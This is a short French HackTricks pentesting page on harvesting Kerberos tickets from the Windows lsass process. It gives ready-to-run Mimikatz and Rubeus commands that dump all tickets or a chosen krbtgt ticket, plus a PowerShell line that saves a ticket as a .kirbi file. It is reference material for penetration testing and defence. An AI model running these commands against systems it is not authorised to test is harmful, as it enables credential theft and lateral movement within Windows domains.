hacktricks/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md
2023-06-03 13:10:46 +00:00

4.4 KiB
Raw Blame History

Récupération de tickets depuis Windows

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Sous Windows, les tickets sont gérés et stockés par le processus lsass (Local Security Authority Subsystem Service), qui est responsable de la sécurité. Par conséquent, pour récupérer des tickets à partir d'un système Windows, il est nécessaire de communiquer avec lsass et de les demander. En tant qu'utilisateur non administrateur, seuls les tickets possédés peuvent être récupérés, cependant, en tant qu'administrateur de la machine, tous peuvent être récoltés. Pour cela, les outils Mimikatz ou Rubeus peuvent être utilisés comme indiqué ci-dessous :

# Using mimikatz
sekurlsa::tickets /export
# Using Rubeus
## Dump all tickets
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

## List all tickets
.\Rubeus.exe triage
## Dump the interesting one by luid
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

Ces informations ont été extraites de: https://www.tarlogic.com/en/blog/how-to-attack-kerberos/

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥